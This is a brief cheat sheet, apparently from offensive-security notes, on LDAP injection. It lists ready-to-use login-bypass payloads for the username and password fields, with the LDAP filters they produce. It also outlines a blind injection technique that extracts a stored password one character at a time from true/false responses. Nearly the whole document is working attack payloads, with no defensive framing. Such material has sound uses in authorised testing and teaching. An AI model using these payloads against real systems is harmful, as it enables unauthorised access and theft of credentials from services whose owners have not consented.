# Basic LDAP Injection

`# Classical request : (&(uid=)(userPassword=))`\
`# So result is TRUE if uid AND userPassword are true`\
`# You can put ‘)’ in request to crash and see the request`\
\
`username : *)(|(uid=*`\
`password : )`\
\
`→ (&(uid=*)(|(uid=*)(userPassword=)))`\
\
`OR`\
\
`username=*`\
`password=*)(&`\
\
`→ (&(uid=*)(userPassword=*)(&))`\
\
\
**Blind LDAP Injection** \
`# You have to find/imagine how is the request built`\
\
`# test using only a char → OK → request is (mail=*[texte]*)`\
`# You can try (mail=*)(sn=*) → )(sn= → OK`\
`# Then, the password attribute (mail=*)(password=*) → OK`\
\
`@*)(password=x → FALSE`\
`@*)(password=d → TRUE`\
\
`# You can the enumerate each char`